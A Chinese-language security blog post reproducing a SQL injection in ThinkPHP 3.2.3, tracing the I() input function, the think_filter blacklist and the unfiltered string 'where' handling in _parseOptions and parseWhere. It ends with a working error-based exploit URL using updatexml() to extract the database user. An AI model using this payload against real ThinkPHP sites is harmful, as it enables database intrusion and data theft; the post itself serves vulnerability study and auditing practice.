开始复现审计一下tp3和tp5的框架漏洞,当个练习吧。

涉及注入的方法为where() table() delete()等。

环境 tp3.2.3 :

0x01 注入成因

测试代码:

    public function index2(){

//        $data = M('user')-> where('username = "admin"')->select();

//        dump($data);

        $id = i('id');

        $res = M('user')->find($id);

I方法断点 跟进去看。

F7跟进, thinkphp/ThinkPHP/Common/functions.php :

从283行开始看 首先判断提交方式:

......

switch(strtolower($method)) {

        case 'get'     :

            $input =& $_GET;

            break;

        case 'post'    :

            $input =& $_POST;

            break;

        case 'put'     :

            if(is_null($_PUT)){

                parse_str(file_get_contents('php://input'), $_PUT);

            }

            $input     =    $_PUT;

            break;

        case 'param'   :

            switch($_SERVER['REQUEST_METHOD']) {

                case 'POST':

                    $input  =  $_POST;

                    break;

                case 'PUT':

                    if(is_null($_PUT)){

                        parse_str(file_get_contents('php://input'), $_PUT);

                    }

                    $input     =    $_PUT;

                    break;

                default:

                    $input  =  $_GET;

            }

            break;

        case 'path'    :

            $input  =   array();

            if(!empty($_SERVER['PATH_INFO'])){

                $depr   =   C('URL_PATHINFO_DEPR');

                $input  =   explode($depr,trim($_SERVER['PATH_INFO'],$depr));

            }

            break;

        case 'request' :

            $input =& $_REQUEST;

            break;

        case 'session' :

            $input =& $_SESSION;

            break;

        case 'cookie'  :

            $input =& $_COOKIE;

            break;

        case 'server'  :

            $input =& $_SERVER;

            break;

        case 'globals' :

            $input =& $GLOBALS;

            break;

        case 'data'    :

            $input =& $datas;

            break;

        default:

            return null;

    }

重点看过滤的地方

think_filter:

function think_filter(&$value){

// TODO 其他安全过滤

// 过滤查询特殊字符

if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i',$value)){

    $value .= ' ';

}

}

这里基本就是成因了 黑名单过滤 但是有漏网之鱼 常见的updataxml()报错函数都没过滤。

跟到后面在函数 parseSet可以看到我们提交的字符串作为占位符:

protected function parseSet($data) {

        foreach ($data as $key=>$val){

            if(is_array($val) && 'exp' == $val[0]){

                $set[]  =   $this->parseKey($key).'='.$val[1];

            }elseif(is_null($val)){

                $set[]  =   $this->parseKey($key).'=NULL';

            }elseif(is_scalar($val)) {// 过滤非标量数据

                if(0===strpos($val,':') && in_array($val,array_keys($this->bind)) ){

                    $set[]  =   $this->parseKey($key).'='.$this->escapeString($val);

                }else{

                    $name   =   count($this->bind);

                    $set[]  =   $this->parseKey($key).'=:'.$name;

                    $this->bindParam($name,$val);

                }

            }

        }

        return ' SET '.implode(',',$set);

    }

_parseOptions方法:

if (is_array($options)) { //当$options为数组的时候与$this->options数组进行整合

            $options = array_merge($this->options, $options);

        }

        if (!isset($options['table'])) {//判断是否设置了table 没设置进这里

            // 自动获取表名

            $options['table'] = $this->getTableName();

            $fields           = $this->fields;

        } else {

            // 指定数据表 则重新获取字段列表 但不支持类型检测

            $fields = $this->getDbFields(); //设置了进这里

        }

        // 数据表别名

        if (!empty($options['alias'])) {//判断是否设置了数据表别名

            $options['table'] .= ' ' . $options['alias']; //注意这里,直接拼接了

        }

        // 记录操作的模型名称

        $options['model'] = $this->name;

        // 字段类型验证

        if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) { //让$optison['where']不为数组或没有设置不进这里

            // 对数组查询条件进行字段类型检查

           ......

        }

        // 查询过后清空sql表达式组装 避免影响下次查询

        $this->options = array();

        // 表达式过滤

        $this->_options_filter($options);

        return $options;
当我们传入的值不为数组,直接进行解析返回带进查询,没有任何过滤。

同时$options['where']也一样,看到parseWhere函数
$whereStr = '';

        if (is_string($where)) {

            // 直接使用字符串条件

            $whereStr = $where; //直接返回了,没有任何过滤

        } else {

            // 使用数组表达式

           ......

        }

0x02 复现利用

http://www.qing-tp3.com/index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

跟到最后的时候还是有点小绕 delet那些方法产生注入大同小异 回来再写 上班~

 

代码审计-thinkphp3.2.3框架漏洞sql注入的更多相关文章

  1. 五十:代码审计-PHP无框架项目SQL注入挖掘技巧

    代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码 ...

  2. 【代码审计】大米CMS_V5.5.3 SQL注入漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  3. 【漏洞复现】CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析与复现

    影响版本 wordpress < 5.8.3 分析 参考:https://blog.csdn.net/qq_46717339/article/details/122431779 在 5.8.3 ...

  4. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  5. Web常见安全漏洞-SQL注入

    SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞. 可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作, 甚至有可 ...

  6. 了解web漏洞-sql注入

    1:为什么要学web漏洞? 作为一个运维人员,日常工作就是保障服务器和网站的业务正常运行,平时也需要对服务器的安全工作加固,说到防护攻击问题,那么久必须去了解攻击者是怎么对服务器发动的一个流程,这样才 ...

  7. 14-15.Yii2.0模型的创建/读取数据使用,框架防止sql注入

    目录 创建数据库 表article 配置 db.php 连接数据库 创建控制器 HomeController.php 创建models 创建数据库 表article 1.创建库表 CREATE TAB ...

  8. 常见Web安全漏洞--------sql注入

    SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库执行一些恶意的操作.在mybatis 中比较容易出现:${} 会发生sql 注入问题 #{}: 解析为一个 JDBC 预编译语句(p ...

  9. 基础Web漏洞-SQL注入入门(手工注入篇)

    一.什么是SQL注入  SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL.而SQL注入是将Web页面的原URL.表单域或数据包输入的参数,修改拼接成SQ ...

随机推荐

  1. 【学习笔记】第一章 python安全开发简介

    1.1为什么黑客喜欢用python? python为我们提供了非常完善的基础代码库,覆盖了网络.文件.GUI.数据库.文本等大量内容,被形象的称为“”内置电池“”,用python开发,许多功能不必从零 ...

  2. 苹果系统IOS第三方管理工具——imazing 优秀

    iMazing 是一款 Windows.macOS 平台的 iPhone.iPad 管理工具,可以进行文件.音乐.视频传输,备份与还原数据,并且可以管理已安装应用,比如重新安装那些已下架的应用,是「史 ...

  3. Java线程池的拒绝策略

    一.简介 jdk1.5 版本新增了JUC并发编程包,极大的简化了传统的多线程开发.前面文章中介绍了线程池的使用,链接地址:https://www.cnblogs.com/eric-fang/p/900 ...

  4. 【linux】【docker】docker及docker-compose安装

    安装 一. docker安装 Centos 安装docker18.03 wget https://download.docker.com/linux/centos/7/x86_64/stable/Pa ...

  5. java.sql.SQLException: Data truncation: Incorrect string value: '\xE5\x91\xA8\xE6\x9D\xBE' for column 'cname' at row 1 Query

    在将项目上传到服务器时,发生这样的错误,总结了一下. 环境Centos7+tomcat7+Mariadb数据库 首先mysql -uroot -p 输入密码 然后查询数据库当前码表状态 show va ...

  6. Android Studio [RecyclerView/瀑布流显示]

    PuRecyclerViewActivity.java package com.xdw.a122.recyclerview; import android.support.v7.app.AppComp ...

  7. windows无法安装到这个磁盘怎样解决,及激活

    在cmd输入.sql server 2008  slmgr.vbs -ipk KH2J9-PC326-T44D4-39H6V-TVPBY  这个问题遇到的挺多次的,依稀记得上次搞这个问题搞了很久,今天 ...

  8. 平行世界中的你还是你吗?--java中的==是否相等

    故事背景 <宇宙追缉令>是黄毅瑜执导的动作科幻类电影,由哥伦比亚三星公司出品,戴尔里·林多.李连杰.杰森·斯坦森领衔主演.影片于2001年11月2日在美国上映.该片讲述了邪恶尤兰,为了成为 ...

  9. springboot + thymeleaf静态资源访问404

    在使用springboot 和thtmeleaf开发时引用静态资源404,静态资源结如下: index.html文件: <!DOCTYPE html> <html xmlns:th= ...

  10. grep 命令使用

    grep是Linux中最常用的"文本处理工具"之一,用于在文本中查找指定的字符串. 语法: grep [OPTION]... PATTERN [FILE]... 参数: -i:在搜 ...